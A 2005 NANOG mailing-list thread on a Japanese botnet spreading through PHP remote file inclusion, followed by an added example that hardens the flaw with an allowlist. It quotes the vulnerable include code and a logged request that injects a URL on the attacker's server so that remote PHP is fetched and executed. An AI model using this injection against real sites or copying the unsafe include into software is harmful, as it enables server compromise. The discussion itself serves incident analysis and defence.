North American Network Operators Group

RE: Re:Destructive botnet originating from Japan

  • From: Hannigan, Martin
  • Date: Fri Dec 23 19:54:40 2005

You'd think nsp-sec people would try and get nsp-jp involved. Oh, there is no nsp-jp, or skooter 15. :)
 -----Original Message-----
From:   Barrett G. Lyon [mailto:blyon@prolexic.com]
Sent:   Fri Dec 23 19:21:47 2005
To:     nanog@merit.edu
Subject:        Re:Destructive botnet originating from Japan


Well, it appears that bad code always seems to be the root of 
problems. According to our research today, the problem appears to be 
caused by incorrectly written PHP applications that perform includes 
using a string without running any validation against the string:

index.php?test=test
$test = $_GET['test'];   // request parameter taken as-is, no validation
include("$test.php");    // whatever the client supplied is included and executed

When the include executes the test string passed from the GET 
includes execution instructions:

       "GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"

It appears that the attacker at 210.170.60.2 (also the botnet hosting 
IRC server) is spreading his code as the include is called, pulling 
and executing PHP code from a remote server that injects the software.

I'm not sure if this needs to be alerted to anyone outside of this 
list, but it's pretty nasty.


-Barrett
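As an added illustration, not part of the original post or Barrett's code, here is the include pattern he describes next to a hardened version that resolves the request parameter through an allowlist of local page files (the page names and paths are hypothetical):

```php
<?php
// Added example, not from the original post. The unsafe include pattern
// described on the list, and a hardened version that never uses the
// request parameter as a path.

// Unsafe: the request parameter goes straight into include(). With remote
// URL wrappers enabled for include (php.ini allow_url_include = On), a
// client-supplied URL is fetched and executed as PHP.
function includePageUnsafe(array $get): void
{
    $test = $get['test'];
    include("$test.php");
}

// Hardened: the parameter is only a key into a fixed allowlist of local
// files (hypothetical names and paths). Keep allow_url_include = Off in
// php.ini as defense in depth; that setting cannot be changed at runtime.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolvePage(?string $name): ?string
{
    // Reject anything that is not a short lowercase identifier before the
    // lookup, so URLs, slashes and traversal sequences never reach it.
    if ($name === null || !preg_match('/^[a-z]{1,32}$/', $name)) {
        return null;
    }
    return PAGES[$name] ?? null;
}

function includePageSafe(array $get): void
{
    $path = resolvePage($get['test'] ?? null);
    if ($path === null || !is_file($path)) {
        http_response_code(404);
        echo 'Not found';
        return;
    }
    include $path;
}

includePageSafe($_GET);
```

A request such as the logged `test=http%3A//...` fails the regex in resolvePage() and is answered with a 404 instead of an include, and those 404s are a useful thing to alert on in the web server logs.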